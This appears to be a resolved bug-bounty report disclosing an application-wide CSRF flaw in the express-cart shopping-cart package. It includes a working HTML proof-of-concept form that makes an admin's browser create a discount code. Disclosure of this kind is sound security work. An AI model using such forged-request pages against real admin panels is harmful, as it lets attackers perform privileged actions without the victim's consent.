[express-cart] Wide CSRF in application
Medium
Vulnerability Details
I would like to report a CSRF vulnerability in `express-cart`.
It allows an attacker to trick an admin into performing privileged actions. The root cause is that no CSRF token is used, so the vulnerability is application-wide.
# Module
**module name:** `express-cart`
**version:** `1.1.16`
**npm page:** `https://www.npmjs.com/package/express-cart`
## Module Description
> expressCart is a fully functional shopping cart built in Node.js (Express, MongoDB) with Stripe, PayPal, Authorize.net, Adyen and Instore payments.
## Module Stats
weekly downloads: 21
# Vulnerability
## Vulnerability Description
- Through CSRF an attacker can create products, orders, users, discount codes, etc. (requires an admin to act on the malicious page)
## Steps To Reproduce:
- Demo: create discount codes (see the attached clip)
1. Create a PoC HTML page (generated by Burp Suite)
2. The admin clicks it
3. A `discount code` is created
- PoC:
```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:1111/admin/settings/discount/create" method="POST">
<input type="hidden" name="code" value="CSRF-CODE-DEMO" />
<input type="hidden" name="type" value="percent" />
<input type="hidden" name="value" value="30" />
<input type="hidden" name="start" value="21/02/2020 14:32" />
<input type="hidden" name="end" value="22/02/2020 14:32" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
# Wrap up
- I contacted the maintainer to let them know: N
- I opened an issue in the related repository: N
## Impact
An attacker can perform actions with admin privileges.
Report Stats
- Report ID: 800356
- State: Closed
- Substate: resolved
- Upvotes: 4